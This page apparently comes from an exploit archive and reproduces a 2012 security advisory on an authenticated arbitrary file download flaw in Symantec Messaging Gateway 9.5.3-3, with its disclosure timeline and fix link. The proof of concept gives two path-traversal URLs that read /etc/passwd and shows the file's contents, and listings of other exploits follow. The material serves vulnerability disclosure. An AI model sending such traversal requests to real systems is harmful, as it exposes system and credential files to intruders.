Menu

Search for hundreds of thousands of exploits

"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download"

Author

Exploit author

"Ben Williams"

Platform

Exploit platform

linux

Release date

Exploit published date

2012-12-03

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
=======
Summary
=======
Name: Symantec Messaging Gateway - Arbitrary file download is possible with a crafted URL (authenticated)
Release Date: 30 November 2012
Reference: NGS00266
Discoverer: Ben Williams <ben.williams@ngssecure.com>
Vendor: Symantec
Vendor Reference: 
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: Medium
Status: Published

========
TimeLine
========
Discovered: 17 April 2012
Released: 17 April 2012
Approved: 29 April 2012
Reported: 30 April 2012
Fixed: 27 August 2012
Published: 30 November 2012

===========
Description
===========
I. VULNERABILITY
-------------------------
Symantec Messaging Gateway 9.5.3-3 - Arbitrary file download is possible with a crafted URL (authenticated)

II. BACKGROUND
-------------------------
Symantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance

III. DESCRIPTION
-------------------------
The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user

=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
Various files containing sensitive information can be downloaded using a crafted URL for example:

http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1

Which produces a file containing:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
postfix:x:100:101::/home/postfix:/bin/bash
mailwall:x:500:501::/home/mailwall:/bin/bash
mysql:x:501:103::/home/mysql:/bin/bash
bcc:x:502:99::/home/bcc:/bin/bash
support:x:503:503::/home/support:/bin/bash
admin:x:504:501::/home/admin:/bin/rbash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin

Simliar issues can be seen in other places such as here:

http://192.168.1.59:41080/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd

===============
Fix Information
===============
An updated version of the software has been released to address the vulnerability:

http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00

NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2012-12-03 "Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download" webapps linux "Ben Williams"
2012-12-03 "Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery" webapps multiple "Ben Williams"
2012-05-02 "Websense Triton - Multiple Vulnerabilities" webapps cgi "Ben Williams"
2011-12-15 "Websense 7.6 - Triton Report Management Interface Cross-Site Scripting" webapps cgi "Ben Williams"
2011-12-15 "Websense 7.6 Products - 'favorites.exe' Authentication Bypass" webapps cgi "Ben Williams"
2011-12-15 "Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution" webapps cgi "Ben Williams"
2000-10-21 "David Bagley xlock 4.16 - User Supplied Format String (2)" local unix "Ben Williams" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected